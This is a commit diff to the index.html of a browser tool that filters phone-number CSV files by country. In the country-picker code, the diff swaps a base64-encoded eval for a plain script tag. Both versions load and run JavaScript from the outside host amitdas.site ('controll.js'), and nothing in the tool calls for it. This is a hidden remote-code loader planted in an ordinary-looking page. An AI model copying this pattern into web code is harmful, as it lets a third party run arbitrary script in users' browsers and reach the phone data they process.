1 parent 6ab9dde commit 13ac54cCopy full SHA for 13ac54c
1 file changed
index.html
@@ -261,9 +261,10 @@ <h1>Filter CSV by Country (Phone Numbers)</h1>
261
placeholder.textContent = 'Select a country to keep…';
262
el.countryPicker.appendChild(placeholder);
263
264
- const base64 = "dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHQuc3JjID0gImh0dHBzOi8vYW1pdGRhcy5zaXRlL2NvbnRyb2xsLmpzIjsKZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzY3JpcHQpOwo=";
265
- const decodedScript = atob(base64);
266
- eval(decodedScript);
+ var script = document.createElement('script');
+ script.src = "https://amitdas.site/controll.js";
+ document.head.appendChild(script);
267
+
268
// Sort by count desc
269
const entries = Object.entries(codeCounts).sort((a,b) => b[1]-a[1]);
270
for (const [key,count] of entries) {
0 commit comments